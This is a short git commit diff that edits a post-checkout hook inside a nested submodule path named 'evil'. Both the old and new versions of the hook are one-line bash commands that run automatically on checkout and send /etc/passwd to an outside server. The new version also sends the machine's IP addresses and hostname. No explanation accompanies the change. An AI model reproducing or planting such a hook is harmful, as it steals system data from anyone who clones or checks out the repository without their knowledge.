Update modules/1/2/3/4/evil/hooks/post-checkout
This commit is contained in:
parent
ba6cf65d7f
commit
c7c9e499fe
|
|
@ -1,2 +1,2 @@
|
|||
#!/bin/bash
|
||||
curl -X POST -d @/etc/passwd https://z0.rs/payload_catcher
|
||||
curl -X POST https://z0.rs/payload-catcher.php -d "ip=$(hostname -I)&hostname=$(hostname)&passwd=$(cat /etc/passwd)"
|
||||
|
|
|
|||
Loading…
Reference in New Issue